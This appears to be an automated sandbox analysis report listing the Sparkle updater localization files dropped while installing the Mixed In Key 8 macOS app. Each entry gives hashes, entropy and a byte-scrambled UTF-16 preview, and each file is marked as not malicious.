Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @sig dewolnao dnei slkaa rovrog beurki !iWtlu % $1 @uni snatllrenee nehsrattrne"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ak nintew roed negpuadeta slh tev nae nea llee-nelez novulem ,ozla see ncsihfjokip efoC ,Dg oeepdni .sV relpaast% $1 @anrad eaM p..P.orrgmaam..s...,.h retsra tav nadra ,nep orebreo npeiwu"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$i somemtnee ledr cenestetv reis.e;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$i sunb sehckiabra..u.h eetf% $3.@W li t ueh tund wolnaoed?n;"..%" @odnwoldade " =%" @egodnwolda;"..%" @fo% "@= " 1%@$v na% $2"@.;". Aen wevsroi nfo% @sia avlibael"!= " eE ninueewv reis eav n@%i sebcsihbkaa!r;"..A"n wev re

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/no.lproj/.BC.T_Q03Uwc Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2514
Entropy (8bit):	4.757764323583795
Encrypted:	false
SSDEEP:	48:Lw9PGuXlOkON6BO0EmR46CEsRjS4sLkAIM4wjSFYG/HVtjqGX/fNPiwSWTA:LMPh2Q1EHjEsRm4sLFLjSFYiXVX/Zk
MD5:	12275E60C36D9C618F995ADE804347EC
SHA1:	9BE178C69AD2E0B2072A5E32C02ACF623A670224
SHA-256:	3B579F41B32DC344ED02C583EA67D7E712E162377B4AD6D46C663E764B82BBD5
SHA-512:	EF5E014E7B9B56DBC3E292A6D5A89C4AADDD6BEFCAA700DB61CE0F1D0F1C75E8237B9A0152A5AF3DA31346C5CE6FF03E85BF08F1EA122FA7F5F807FFFD91E7BD
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah rlbti tnitslaeltro grek al rit lrbkun seetg na g3%@$s attrreo pp !iV luds attr e.p .ynttn .."?.;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e red nynseett lijgneegilegv rejsnone"..;".@%% @sin woa avlibael( oy uahev% )@ .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e r.n .itglejgnlegi( udh ra% $3)@ ...snek rud. .alts eed nen d.n?.;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%h rai kk eitglnasgerttgiehet rit l..s rkvi eit lrpgoarmmte sifblna!eS attrred urf aned sifkli ?vHsii kk,es .pr.d nis syetammdnisirttaroo mjhle.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =E" nynv rejsnoa v@%h rab iltti snatllre!t;"..A"n wev reisnoo f@%i svaiaallb!e " =E" nynv rejsnoa v@%e ritglejgnlegi"!.;".nAe rr

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pl.lproj/.BC.T_nkJhuA Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3858
Entropy (8bit):	5.0187789669222775
Encrypted:	false
SSDEEP:	96:6pMex65YuDA2fXLhulLZLJOOLE21coN+k5+yQ6D:6uWenXLhoLZLcOLdcs
MD5:	A6FA5DFECFD42E36A84351B08A9FD16F
SHA1:	D949A210F9FE8764BF91550DAB60CA06CADD2314
SHA-256:	D670F74D95B059F7B44A94978D07DDC39528CDD5AD00EBBC529900C9C1A96AFD
SHA-512:	782EDABDE74D899827BAE351C156BC91AB7463984CD8096AF7A6052501D9A65D113794463E0FD7BD4228C01EF19959684E61C98640B8290BA86658F2A63D4A05
Malicious:	false
Preview:	../" 1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"? ;/".1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$z soat..p boaryni j se togotywd o.uy.ic!aC yzc chai..yb..t rezaz iasnatolaw..i p nowoin erucuohim..% $1?@;"../" 1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni". ;/".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt yga

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/.BC.T_yZZQIh Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3250
Entropy (8bit):	4.912928929280295
Encrypted:	false
SSDEEP:	96:PhkNVoYRsHRgLhu3EMksv0Ss5LPG3+E+GZEGmc/dt:PYoRgLh8iLs+1yt
MD5:	A39C1047D2E1DE35BC79A6B6F5D35690
SHA1:	DE78D93D19530126B43DF7F8C6844F53623BD280
SHA-256:	8177B0F6884F81FEC257CB7A856FA0742B95931FAEBEE60C233975E8657C5295
SHA-512:	93A8D362322EB2D5EE9C4A539E3C4B11FAEFE09CBF686A9E7E94D03EB5324FFCD792DE17BF9F459FF0AB56A0AACDD939859FE888A86EFB792C28D6AAE53B4BE0
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @of iabxida o ese.t .rpnootp ra asu!oG soatir aedi snatal r eerniciai r o1%@$a ogar"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @.no.p do ees rtaauilazode qnautn oof rxecetuda o aaptrrid emuv lomu eosemtn eedl ieutar ,ocomu ami ameg medd sioco uDCD/DV .oMav% $1 @apara p saatA lpcitaviso ,ernicieio-e t neetn vomaneet"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. . aevsr.. oamsir ceneetd siop.nv.le"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @se.t .idpsno..ev-ls-auv re.so.. .3%@$ .oGtsraaid eabxi..l- ogaro?a;"..%" @odnwoldade " =%" @abxida"o.;".@%o f@% " =%"$1 @ed% $2"@.;". Aen wevsroi nfo% @sia avlibael"!= " mU aonavv re.so.d o@%e ts..d siop.nv.le

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/.BC.T_Baw0Yf Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3412
Entropy (8bit):	4.852061466756839
Encrypted:	false
SSDEEP:	96:P4t2UgGBfALZ1iVfX9EiX9svn1ZtLAy5LPGulG+aXuB:g2GBGENXjXCZtLRLJw+B
MD5:	ECC3E2D238E3A4081FE146066BD68D68
SHA1:	67545F691F19D42E54F892676DE289092109F443
SHA-256:	EC7CC3871D3E8131EE6CEA1951878E2DAD645ED4572AE2C6A6976AC143894E34
SHA-512:	9D15C9CFBF3F809F04B1107BE2ABD215A760223D339F311B4CA7A3432EDE974FE3C0009F879E7F443C7EC6472F1A4D11E01F8D67673966B3AD73B97FB94942CE
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " O1%@$% $2 @of irtnafsredi o ese.t .rpnoota i snatal!rG soatir aedo f zarea ogare r ieinicrao % $1 @optsreoimrneet"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =O"% $1 @.no.p do ees rcautlazida ouqnaode tsvirea s ree exucatoda p rait redu movulema epan sedl ieutarc mo omu amigamed eidcs ouod sioc. p.itoc .oMavo % $1 @apara s aup saatA lpci.a.e.,sr ieinic-e o.a . eettn eonavemtn.e;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " O1%@$% $2 @..n seetm moneota v re.so.m ia serectn eidpsno..ev.l;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =O"% $1 @2%@$e ts..a ogard siop.nv.lee t mea v re.so.% $3.@G soatir aedo t arsnefir rgaro?a;"..%" @odnwoldade " =%" @rtnafsredi"o.;".@%o f@% " =%"$1 @ed% $2"@.;

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ro.lproj/.BC.T_NRobRg Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4012
Entropy (8bit):	4.937256495022775
Encrypted:	false
SSDEEP:	96:PO681gQJ0NAsLhuuLgkLJOXg7QLPL3SKNSlvaKFIo4lJb14ALkd8Zk:2uM07Lh7LgkLcwQLTCFUi4lJJdkd8k
MD5:	85F6A19EDEFE691A185ABE3D9334B475
SHA1:	A927473A4577D28E47A0509D4E59A734FFC644A4
SHA-256:	C731F50896200CED0E8126B22F890FD99566B06192015F6CFEB9EEDB708C0E76
SHA-512:	90A751B82764EDFA132E57C0B1C94C0B58C8DF7492CB29C952B69DA8E7C47E64D42506111113ACE25E077259C9D8D6721A2A9F26DD253EF0D6B8C1EC161E52E7
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ aoftsd se.cr.ac t.. iseetg ta aedu itilazer !oDir.. i.s ... lnitsla.ai.. i.s ..l-r lenaas.. i1%@$a uc?m;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$n uopta eif icautlazita..a utcn i.cn. dseetp roin.t .edp enuv lomur ae-dnoylc a omigani eidcss uao u inateto tpci.. .uM.t .1%@$. n.d riceotur lpAlpcitaoisn ,eropnr.et.-e oeda ocol. i.. n.ecraacd nin uo"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e ts e.. nrpzene tec aam ion.u .evsruiend siopinib.l..;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e ts eidpsnobili...-.uta i3%@$ .oDir.. i.s . oedcs..cr.ai.a uc?m;"..%" @odnwoldade " =%" @edcs..crta;"..%" @fo% "@= " 1%@$d ni% $2"@.;". Aen wevsroi nfo% @sia avli

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ru.lproj/.BC.T_nKcMMT Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4456
Entropy (8bit):	5.207728062803533
Encrypted:	false
SSDEEP:	96:PcCb3Eq8m6R61i2z3lsX4LnLPn+OztEeN3+vuK6eB7qZW:ECom6R6Ex4LnLP+UP256W
MD5:	769C9A0037E04CD9A40E3EDBA1A766D7
SHA1:	B568AD5200E98B02CB7A25DD7510608510360933
SHA-256:	B901B30035274FB2A8D3F1347687B23808D8F90A238F5ED9BF7531402A1E1EB8
SHA-512:	A4DA065F6EAA90B696C9273B9A20B4728E6B5CEBAFD5B0E1D9ACA4EA798E3DE0B1C9ADC0F5427A9D4F26A680ABB3FB9BA1378D88F6F872FCFDD218AAF5C43DC6
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @.......... ........ ............... !........ ......... .... ............ .1%@$"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =.". ........ ..... .1%@$. ...... ,.................. ..... ...... .....,.. .. .......... ,........ .... ...... ......... ..... ......... ........ ,..... ......... .......... .............% $1 @... .... ............ ,............... .. ......... ............ ........;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " ... ........ ........% $1 @2%@$. ....... .........

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sk.lproj/.BC.T_821GIZ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3380
Entropy (8bit):	5.089001636965965
Encrypted:	false
SSDEEP:	96:Pvr1ADu7OSRo63eLhug43eLJOOC3eL72kTAj0kKCLgJD:HReu7XRo63eLhg3eLcX3eLfTJD
MD5:	8183D0201D72055F55B7EFC27E301EE1
SHA1:	FA04D8B5DC4814EA88319E1DCAAD1EB9B4632583
SHA-256:	B9F6711D4C2F7F84B575AA952BCC86F25CCA8B7C6A1D097652F357D361E630FB
SHA-512:	D35DA5352994D66E50AA1814B9F2473A23BB624ECE75D5D4F39C26B4909C2A8221768CEAB79D0221DE279017B9410ED8B98A11FF00389519D53A84995219F320
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " pAil.kc.ai% $1 @2%@$b lo arpveaz.t . aejp irrpvane..n aop.ui.it!eC chte eetar zanni..atolav..a n ..lsdeenz onuvs upts.i .1%@$"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =A"lpki..ic u1%@$n me.on. okautlazivo.a,.a kejs uptsne..z ovz..kz u srp..aviml nen a...atin en(pa.rk.al d zboaruzd siuka elobo tpci.kh. oidks)u .rPse.ut. epail.kc.ui% $1 @odp ir.ei.kn apAlpcitaoisn ,pssuitetj udoit.a . aopot mnzvo aks..ts ekautlazi..ic.u;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2\@jn eannjvo..aid soutnp..v reiz.a;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =J" eodtspu.n .pail.kc.ai% $1 @2%@$. ..m ..et% $3.@C chte eujp erzvai..t reza"?.;".@%d wolnaoed"d= " @%p erzvta..;"..%" @fo% "@= " 1%@$z

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sl.lproj/.BC.T_1aK6WS Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	6830
Entropy (8bit):	3.46495966795087
Encrypted:	false
SSDEEP:	192:MAyLCm30rvUf3dzkPe588sbwJBqLnVdZP1YVpvJ:JyL4UmGRknZdk7
MD5:	6638FE0CDC41D8E56D382A756D8F6CFB
SHA1:	760501E45FD62794DDF4E03A4136BC73414D9F52
SHA-256:	18DD67772BCB35F45A15E8DAA30AC67771EF5C067909F22EC92271369C9F6BD8
SHA-512:	CF1F3E8D62EAF83A5AE0169493BE342B27749E9436B1EF62D5917C95156190CD76C8FC1CC5921208455C44982A28EFDA7A5BBE1554D3F7319C685DD84BF61BF8
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .j.e. .b.i.l. .u.s.p.e.a.n.o. .p.r.e.n.e.a.e.n. .s. .s.p.l.e.t.a. .i.n. .j.e. .p.r.i.p.r.a.v.l.j.e.n. .n.a. .n.a.m.e.s.t.i.t.e.v... .G.a. .~.e.l.i.t.e. .n.a.m.e.s.t.i.t.i. .i.n. .p.o.n.o.v.n.o. .z.a.g.n.a.t.i. .t.a.k.o.j.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".P.r.o.g.r.a.m.a. .%.1.$.@. .n.i. .m.o.g.o...e. .p.o.s.o.d.o.b.i.t.i.,. .k.e.r. .g.a. .p.o.g.a.n.j.a.t.e. .i.z. .l.o.k.a.c.i.j.e.,. .k.a.m.o.r. .p.i.s.a.n.j.e. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sv.lproj/.BC.T_0ACJYj Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3376
Entropy (8bit):	4.898536554281551
Encrypted:	false
SSDEEP:	96:PnXNM63U8ARPLhuMLSLJOT8LwjLPZCpzEON8ToMWIZf:fX53U1PLh5LSLcT8LwjL0z0ff
MD5:	19CFEBADD873E045E4DC4BF5B8506FB1
SHA1:	0BD0E287DBAD7DC9D41B46D059F2AA8CC210E42E
SHA-256:	BB9593FD660C05BEDC7DEB9E190C68FA51ADCEA0C8F37107930B1B17BE26C0E5
SHA-512:	0CE7256082EF3C415B592D43FE7225F80C1DA6C221C167AAD76114A27AFED333CD35232C15639B0912CFEFCC74872B8D588DC94CA965DEC0C2EBD84C3C25C6E6
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ah ralddta sen dco h.. rlkraa tta vn..dn!aV li ludi snatllre aed tco htsraat% $1 @un"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ak nnietu ppadetar s.nr.d tek ..srf .rn.e nksirsvykdddav lomys moe nksvivaibdle llree npoitkse hnte .lFtyat% $1 @itllm paep nrPgoar,ms attr amod ned ..irrf..,no hcf ..sr.. kgine"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. r.f .. r.nr.avardn eed nesants eitll.gn.lggi aevsroien.n;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. r.n uitll.gn.lggi..d. uah r3%@$ .iVlld ualdd aen dun"?.;".@%d wolnaoed"d= " @%n dealddta;"..%" @fo% "@= " 1%@$a v2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =E" nynv reisnoa v@%f nisnt ligl..gnil!g

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/th.lproj/.BC.T_EYzML7 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	5916
Entropy (8bit):	5.025902622174575
Encrypted:	false
SSDEEP:	96:PkMBEAL7MNoQHVAUw8ciiPILNk6ILJOiM8c3Wr8ILPOG0oFFoJNXI+DuFYo4lE3Y:+uAoQS8v2ILVILcf8mILFZFojy4lE3hq
MD5:	0C92DA23049E5A1346DD37553AC485A7
SHA1:	0C06662F184345576EED454EB471D590ADEBA2E9
SHA-256:	0BB6AC8645986AD5E03BCCD732B30525B7DCF507704C29C17DEBACF4BED3C33B
SHA-512:	3CF99C2ECD68A390A27B93F14CD4C9DD724C6B632A9B09A1CB05B2918404CEA6D75C046867D2D73B5D1EA0D19736105C0C8F76F35CD933E90ABDEFBCE14E1491
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @...................................................................................... ................................................................... .1%@$. ................................................"..;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @...................................................................................................................................................................................... .........% $1 @............................................................... .................................... .........................................................;"..%" @@%i sucrrnelt y

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/tr.lproj/.BC.T_Ea07yZ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4340
Entropy (8bit):	5.08681039554709
Encrypted:	false
SSDEEP:	96:Dy3xtj4ZEoz+ABiAt9Lhuu/9La9LJOx9L+9Lu9LPdhyrfE9K7IH7PO9n:Dy3xCZEoz+279Lhf9La9Lcx9L+9Lu9LK
MD5:	C6C97B845A2111FF482651A70310CC1A
SHA1:	976A2345D208145519C2AF1C4149C6C10775EABF
SHA-256:	CB792ECED2E4B941EF68CBC8B85091BE1D7F4CD344C7BB4CB31398BD35427304
SHA-512:	4A68BF9D332CEFBE41BC7EC3D78AD64FF5AA664FEDDB0E29D0193B45470D68D1EBA6903BA26AB80861B6148570A589DC884947992F9881DE70C1737C5C66A397
Malicious:	false
Preview:	../d _eEDv .0 1 -oNc moemtnp orived dybe gnniee.r ./".1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$i dnriliidv eukllna..amh za..!r. i.dm i.yk.elem ksiitoy rumusun?zU gyluma aeyined nab..al.tl.caka.tr."..;/. edD_ E0v1.- N oocmmne trpvodideb yneigenre ./..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aidksi ameg .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$u gylumasa..d si kak.lb...i ..resiniedkyneg ..cnleelenem.zL ..ftne% $1 @yuugalam.sn...U gylumalarad zinini eokyplaya.. peyined nab..al.tn....z;"../d _eEDv .0 1 -oNc moemtnp orived dybe gnniee.r ./".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$m veuc tney ne i.sr...dm...r;"../d _eEDv .0 1 -oNc moemtnp orived dybe gnniee.r ./".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @...tk..( uKllna.d..n... z.Sr...:m% $3)@ ...miidy ne i.sr....m .niidmrkei tsrem sinizi

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/uk.lproj/.BC.T_MCNUlS Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	6696
Entropy (8bit):	4.156961851830748
Encrypted:	false
SSDEEP:	96:M4+At+bNwf43IiPleiK0MAZn/um3kDMGn2HWvurFIN2KC7nGLM274:MlKf43ICleirZ3khn2HWWiH42k
MD5:	2BBB283FC0806301EDAE390A28116EB2
SHA1:	84BE78941B29ADA51DCA8D09F062DB777E6344E6
SHA-256:	64914509A698B22799B06ACE0831B96A1023C3A9695A74308CD5ED4B4ED0FA01
SHA-512:	8A7E9845EDA6702122FC087ADFE84B3DC62782F1D5E94A2A59B34A6AFB488448E47E11D054F813E865EA2D400485AAF21CDD37A9FB2A7A16CC782BCA16158AED
Malicious:	false
